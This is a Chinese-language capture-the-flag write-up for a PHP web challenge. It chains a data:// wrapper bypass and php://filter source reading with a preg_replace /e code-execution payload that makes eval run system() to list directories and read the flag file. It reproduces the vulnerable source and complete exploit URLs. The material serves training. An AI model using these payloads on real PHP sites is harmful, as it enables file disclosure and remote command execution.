提示
- 伪协议的各种应用
首先我们来一步一步分析
首先要判断text是否传入参数,并且将传入的text以只读的方式打开要绝对等于I have a dream才会进入下一步
这里需要用到伪协议data://text/plain或者php://input都可以
最终要利用到这个include包含函数
这里提示了next.php,file参数里不能有flag
这里我们构造payload
?text=data://text/plain,I%20have%20a%20dream&file=next.php
成功包含了next.php页面但是并没有什么有用信息
重新构造payload读取next.php源码
?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php
解码后获得
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
从整个代码来看
我们需要利用到getFlag()这个函数,但是并没有引用,所以就得想办法让可以使用这个函数
这里就需要用到PHP正则表达式的逆向引用与子模式
函数preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
在 subject 中搜索 pattern 模式的匹配项并替换为 replacement。如果指定了 limit,则仅替换 limit 个匹配,如果省略 limit 或者其值为 -1,则所有的匹配项都会被替换。
replacement可以包含\\n形式或$n形式的逆向引用,n可以为0到99,\\n表示匹配pattern第n个子模式的文本,\\0表示匹配整个pattern的文本。所谓“子模式”就是:$pattern参数中被圆括号括起来的正则表达式(pattern即为模式)。
现在开始构造payload
/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('ls');
括号内需要用到什么函数就填什么函数,这里我们需要用到getFlag()函数里的eval来执行命令
直接去查看网站根目录
/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('ls ../../../../../');
找到flag
/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('cat ../../../../../flag');
